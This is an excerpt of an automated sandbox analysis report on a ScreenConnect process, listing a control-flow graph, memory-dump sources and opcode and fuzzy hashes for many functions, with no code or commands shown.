                                                                                                                                                                                                                                                          control_flow_graph 427 7ffe7e0901b5 428 7ffe7e0901b8 427->428 428->428 429 7ffe7e0901ba-7ffe7e0901ce 428->429 431 7ffe7e0901ea 429->431 432 7ffe7e0901d0-7ffe7e0901d1 429->432 433 7ffe7e0901ef-7ffe7e0901f5 431->433 432->431 434 7ffe7e0901fb-7ffe7e090204 433->434 435 7ffe7e09028e-7ffe7e090291 433->435 436 7ffe7e090206-7ffe7e090207 434->436 437 7ffe7e09021d-7ffe7e090228 434->437 438 7ffe7e0902e8-7ffe7e090306 435->438 439 7ffe7e090293-7ffe7e09029d 435->439 436->437 440 7ffe7e09022a-7ffe7e09022b 437->440 441 7ffe7e090274-7ffe7e090278 437->441 448 7ffe7e09030a-7ffe7e090316 438->448 449 7ffe7e090450-7ffe7e09046e 438->449 442 7ffe7e0902a5-7ffe7e0902be 439->442 440->441 441->435 446 7ffe7e09032f-7ffe7e09033a 442->446 447 7ffe7e0902c0-7ffe7e0902c2 442->447 454 7ffe7e09033b-7ffe7e09033c 446->454 452 7ffe7e09033e-7ffe7e09034a 447->452 453 7ffe7e0902c4 447->453 450 7ffe7e090318-7ffe7e09031a 448->450 451 7ffe7e09031c-7ffe7e09032a 448->451 467 7ffe7e09050d-7ffe7e090518 449->467 468 7ffe7e090474-7ffe7e09047e 449->468 456 7ffe7e09032d-7ffe7e09032e 450->456 451->456 458 7ffe7e09034c-7ffe7e09034e 452->458 459 7ffe7e090350-7ffe7e090351 452->459 453->448 457 7ffe7e0902c6-7ffe7e0902ca 453->457 454->452 456->446 457->454 461 7ffe7e0902cc-7ffe7e0902d1 457->461 462 7ffe7e090361-7ffe7e090365 458->462 463 7ffe7e090352-7ffe7e09035e 459->463 461->463 466 7ffe7e0902d3-7ffe7e0902de 461->466 464 7ffe7e090366-7ffe7e09037e 462->464 463->462 476 7ffe7e090380-7ffe7e090382 464->476 477 7ffe7e090384-7ffe7e090392 464->477 469 7ffe7e09034f 466->469 470 7ffe7e0902e0-7ffe7e0902e5 466->470 473 7ffe7e090480-7ffe7e090482 468->473 474 7ffe7e090484-7ffe7e090492 468->474 469->459 470->464 475 7ffe7e0902e7 470->475 478 7ffe7e090495-7ffe7e0904b2 473->478 474->478 475->438 479 7ffe7e090395-7ffe7e0903b2 476->479 477->479 484 7ffe7e0904b8-7ffe7e0904c6 478->484 485 7ffe7e0904b4-7ffe7e0904b6 478->485 486 7ffe7e0903b8-7ffe7e0903c6 479->486 487 7ffe7e0903b4-7ffe7e0903b6 479->487 488 7ffe7e0904c9-7ffe7e0904e6 484->488 485->488 489 7ffe7e0903c9-7ffe7e0903df 486->489 487->489 494 7ffe7e0904e8-7ffe7e0904ea 488->494 495 7ffe7e0904ec-7ffe7e0904fa 488->495 496 7ffe7e0903f6-7ffe7e0903fd 489->496 497 7ffe7e0903e1-7ffe7e0903f4 489->497 498 7ffe7e0904fd-7ffe7e090506 494->498 495->498 501 7ffe7e090404-7ffe7e090417 496->501 497->496 502 7ffe7e09041d-7ffe7e090420 497->502 498->467 501->502 503 7ffe7e090437-7ffe7e09044a 502->503 504 7ffe7e090422-7ffe7e090435 502->504 503->449 504->449 504->503
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1788890691.00007FFE7E090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E090000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffe7e090000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: f09ea8eedf370d81ac0e4297c000c4f6bd54d61168f44c1d4f023fc152aa6811
                                                                                                                                                                                                                                                          • Instruction ID: 7d71b53e6bf1b9f3eea2885b12c72e9e6544393ef6f742195c7d06f1de55d76c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f09ea8eedf370d81ac0e4297c000c4f6bd54d61168f44c1d4f023fc152aa6811
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E6A1737162CA1A8FE7A8EF58C491BB532D2FF58305F544178E99DCB2A2DE68FC418740
                                                                                                                                                                                                                                                          Function 00007FFE7E096AB0 Relevance: .1, Instructions: 95COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1788890691.00007FFE7E090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E090000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffe7e090000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 5155603c6a778311bb28c4cd7c4dbf80d0f69c9cd0f720de0884926cbe5c4a1b
                                                                                                                                                                                                                                                          • Instruction ID: d37401b694fc76e46880fcc2936323c21fe79ef70c75270672b5ac7f6e39fd88
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5155603c6a778311bb28c4cd7c4dbf80d0f69c9cd0f720de0884926cbe5c4a1b
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F1316E35A2CA174AEB7ADF25506067961D3AFC4305F54453CD4BE871E2ED2CF8418641
                                                                                                                                                                                                                                                          Function 00007FFE7E097D0A Relevance: .1, Instructions: 86COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1788890691.00007FFE7E090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E090000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffe7e090000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: e4010d91d82ff4f350a091b52973647c037145b579c68a5719ff6d9c5e4fa656
                                                                                                                                                                                                                                                          • Instruction ID: 48cf6c46c732c8b37722914d78359899e4c7fb48171a5c6c2c08d2dcf497f2d8
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e4010d91d82ff4f350a091b52973647c037145b579c68a5719ff6d9c5e4fa656
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1A21273245DB894FD7A6AB3888491A57BF1FF95224B0802BBD4D9C75A2DA2CB842C741
                                                                                                                                                                                                                                                          Function 00007FFE7E097135 Relevance: .1, Instructions: 83COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1788890691.00007FFE7E090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E090000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffe7e090000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 7c67bb6271054438a3a18b55c041981bfe575056187203b8011e9879943e399c
                                                                                                                                                                                                                                                          • Instruction ID: ae10f20a28e6d2cfaae6c9a4be496660c290d4b40ec022ad028b582a2280211e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7c67bb6271054438a3a18b55c041981bfe575056187203b8011e9879943e399c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F321C62356C9460FE756966CA8157F427D2EFC4350F4C01B6D8ACC62E2DD1CA8868351
                                                                                                                                                                                                                                                          Function 00007FFE7E0927DA Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1788890691.00007FFE7E090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E090000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffe7e090000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 7b1c644f424bd888e8a930d12c36347428a00f814893d16fca3b539af4b4f58e
                                                                                                                                                                                                                                                          • Instruction ID: dfc40af5c751dfc32081caf1c712711f32b7b50f83e1e19c9266d1efca9d8450
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7b1c644f424bd888e8a930d12c36347428a00f814893d16fca3b539af4b4f58e
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7E113731218A088FDF88EE28D091FA533E1FB69314F2540ADD45EDB287CA36E852CB40
                                                                                                                                                                                                                                                          Function 00007FFE7E094219 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1788890691.00007FFE7E090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E090000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffe7e090000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 038e426cae9d3ebb9940018a0df5813e22378a1afbcb7fdcb224a57a9f286f98
                                                                                                                                                                                                                                                          • Instruction ID: d55a06aa98343d25b9fa962a47a987719c5b4e485f6ca7b5bc4e5894c044be90
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 038e426cae9d3ebb9940018a0df5813e22378a1afbcb7fdcb224a57a9f286f98
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 73110A26D2C6470BF769962984A137826D2BFA1340F4D41BBC4A9C25F6DD5CBC858301
                                                                                                                                                                                                                                                          Function 00007FFE7E094855 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1788890691.00007FFE7E090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E090000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffe7e090000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 4d4d61859f93acc2c00baa976da8f8a9d073f8628377bb97bfc7668fc0abea98
                                                                                                                                                                                                                                                          • Instruction ID: 94f6df65b1d3d2a44dd6346cf6944c9b44261ae76dc5471820cac7311d213a93
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4d4d61859f93acc2c00baa976da8f8a9d073f8628377bb97bfc7668fc0abea98
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7EF0F61792D9CA0FF3E9962D28982769AD3DBD5222B2902FBD4ACC31E6EC0D6C454341
                                                                                                                                                                                                                                                          Function 00007FFE7E097CBA Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1788890691.00007FFE7E090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E090000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffe7e090000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 6ff362827633048971fef958e1c4d8be88bd100d52368310368e3de57ae0a647
                                                                                                                                                                                                                                                          • Instruction ID: fa4a2d96bbaa7fa7973ef93ff8fa759af5ca69d69b12ba387f77acbb85ca0f4a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6ff362827633048971fef958e1c4d8be88bd100d52368310368e3de57ae0a647
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5CF0F93391D64D8BE760BA5498485A977B1FF98304F040534E0ECD71A2EB386D45C741
                                                                                                                                                                                                                                                          Function 00007FFE7E0942E6 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1788890691.00007FFE7E090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E090000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffe7e090000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 9e6885156d873640aa3cf62146567a6617f58876689fd49687005bae16bce529
                                                                                                                                                                                                                                                          • Instruction ID: 41cec273f5ec7838c1ea20b193a2752abb5c96c331ccfcf5bace42251a75f47a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9e6885156d873640aa3cf62146567a6617f58876689fd49687005bae16bce529
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 29F0FC21A18D5E0BE6E4BAAC5495278B2C2FF98710F494079C46DC32D3EE1CAC524380
                                                                                                                                                                                                                                                          Function 00007FFE7E0959A6 Relevance: .0, Instructions: 42COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1788890691.00007FFE7E090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E090000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffe7e090000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: e2cf131014631e91efb05e5464b3f924b5eb1f16944664ef53bc37cb6d525cd3
                                                                                                                                                                                                                                                          • Instruction ID: 67ec635d54dab98c3262a0859350d4381b7da335c9ff205f82161ebab271add0
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e2cf131014631e91efb05e5464b3f924b5eb1f16944664ef53bc37cb6d525cd3
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F4018631A395171DFE99EF1640A17B82293AF85351F84017CC8AECE1E3CE2CB8098620
                                                                                                                                                                                                                                                          Function 00007FFE7E094B21 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1788890691.00007FFE7E090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E090000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffe7e090000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 3766f797cae46827ed5d974a528be82ac0f97d828ece838312137e52c1200076
                                                                                                                                                                                                                                                          • Instruction ID: b56c1fe449e3a17720a5f574b3ea2f35ff156f2e973abd28c61ba4e94fd6487c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3766f797cae46827ed5d974a528be82ac0f97d828ece838312137e52c1200076
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8DF0EC3321DB850FE7A8DE6CA8835B577D1EB43270B840ABEC9D9C75A7D50AF4428385
                                                                                                                                                                                                                                                          Function 00007FFE7E091085 Relevance: .0, Instructions: 34COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1788890691.00007FFE7E090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E090000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffe7e090000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 0504cd9b938b9e755587f04e2a4cca3d30e1cd70ce200f1d0da836aff9d56b29
                                                                                                                                                                                                                                                          • Instruction ID: 17558216c86a3e46292a5cc435fab4abf86390a773042fc33a89313d10f69d74
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0504cd9b938b9e755587f04e2a4cca3d30e1cd70ce200f1d0da836aff9d56b29
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 97F0E233E0C6599FCB01EF6CD4618E57B70EF41314B0101B3D05CCB062CA26B808CB81
                                                                                                                                                                                                                                                          Function 00007FFE7E09591F Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1788890691.00007FFE7E090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E090000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffe7e090000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 38924c9b855e0d3929b99ee5137ebd1ab16aa680e8d8dbcc36a83963673374c9
                                                                                                                                                                                                                                                          • Instruction ID: e6500f37b7fb3f4e68bce4b46f385ec243f4c6a699b2849b34e091d804f1475e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 38924c9b855e0d3929b99ee5137ebd1ab16aa680e8d8dbcc36a83963673374c9
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A4F05435A2851B4EEEA5DE0A80907B023D3FF89300F980178C85DCB2E6CD3DBC048761
                                                                                                                                                                                                                                                          Function 00007FFE7E09283A Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1788890691.00007FFE7E090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E090000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffe7e090000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: c298a727be90da9409ef4c8df797b8e3ce78d3f474328d81d818d6572381e572
                                                                                                                                                                                                                                                          • Instruction ID: c35bec27e953b6ea80fb159e2b1047b55b390e59827b63dd7fbd909353f0852f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c298a727be90da9409ef4c8df797b8e3ce78d3f474328d81d818d6572381e572
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4CF01D345299498FDF94EF18C490E6673A2FF6830471581E8D85ECB2A6CA29FC01CB40
                                                                                                                                                                                                                                                          Function 00007FFE7E093C29 Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1788890691.00007FFE7E090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E090000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffe7e090000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 1d3f2dd129b74ba92b30ba08c6001d80fa5644abfda42165e627a740a633a9a9
                                                                                                                                                                                                                                                          • Instruction ID: c00605abe8d3132f1fa0686a0230b0b035080a1a492225ac1c613b596fe760a3
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1d3f2dd129b74ba92b30ba08c6001d80fa5644abfda42165e627a740a633a9a9
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B0F0373641C6CD5FDB42EB64D4518D57FB0EF16320B0541D7E059CB063D7259A55CB82
                                                                                                                                                                                                                                                          Function 00007FFE7E0928A4 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1788890691.00007FFE7E090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E090000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffe7e090000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: e771b30a3c7b7675d232021bc1b3cf8b0ca4238dce2fea2263aaf1ef77ff320d
                                                                                                                                                                                                                                                          • Instruction ID: 2292d78f5288002fcfb856782ca5afcbd19a80230b608cdab56e5b131c543a1b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e771b30a3c7b7675d232021bc1b3cf8b0ca4238dce2fea2263aaf1ef77ff320d
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BCF0DA346189498FCF88EF58C490E6577A2FFA830475580ACD85EDB2A7CA25F801CB50
                                                                                                                                                                                                                                                          Function 00007FFE7E092857 Relevance: .0, Instructions: 28COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1788890691.00007FFE7E090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E090000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffe7e090000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: b6f6b9ac50a927c5429917d66fbe2ab85431b7db433f5fb6b8e7a050ef08e9c7
                                                                                                                                                                                                                                                          • Instruction ID: 17ab2c3b4ac7d72aa21f3e04e234730a3df9358461da9c30a42b9d8730d9db81
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b6f6b9ac50a927c5429917d66fbe2ab85431b7db433f5fb6b8e7a050ef08e9c7
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 95F0AC346189088FDF98DF18C090B6533E2FFA831472541A9C45ECB296CA36EC42CB50
                                                                                                                                                                                                                                                          Function 00007FFE7E097C7F Relevance: .0, Instructions: 28COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1788890691.00007FFE7E090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E090000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffe7e090000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 2f17ee1120500d7244e2fc64702110aa35522635fae77050ee7e17ac9e740207
                                                                                                                                                                                                                                                          • Instruction ID: 5f43eb2b6c504bc59c44804c5bac0a2e17d21a08f7a162cf7b307141bd262237
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2f17ee1120500d7244e2fc64702110aa35522635fae77050ee7e17ac9e740207
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D9E02B3250C6488ADB52AB54D80A6EEBBA1EF41325F4400EEC188BB192CA6D1C0C8781
                                                                                                                                                                                                                                                          Function 00007FFE7E090601 Relevance: .0, Instructions: 28COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1788890691.00007FFE7E090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E090000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffe7e090000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: ea56a6e59a3dfc4325404d07f0da1d037fb7544910e9f69a56231a0145dd756e
                                                                                                                                                                                                                                                          • Instruction ID: 1919c65fd4cff306f42d2c393e901c1e937aeec64d6ba99e530782dd169a8e2f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ea56a6e59a3dfc4325404d07f0da1d037fb7544910e9f69a56231a0145dd756e
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 85E0D86110F7D50FD7839B38849C8E13FA0ED5321430900EFD581CF0B3E5199649C751
                                                                                                                                                                                                                                                          Function 00007FFE7E0928C0 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1788890691.00007FFE7E090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E090000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffe7e090000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 967ae92d00be34ce7f412b684c9b3cf4101ef70c470edb2c256a2d40d7b9b791
                                                                                                                                                                                                                                                          • Instruction ID: 526eb6e7294fda9654267eeced2f520f1494746ce96cc5acf350b2087c93c74c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 967ae92d00be34ce7f412b684c9b3cf4101ef70c470edb2c256a2d40d7b9b791
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 09F045346189088FCF98EF18C094B6577E2FBA93147254198D45EDB296CA36EC42CB40
                                                                                                                                                                                                                                                          Function 00007FFE7E094230 Relevance: .0, Instructions: 24COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1788890691.00007FFE7E090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E090000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffe7e090000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
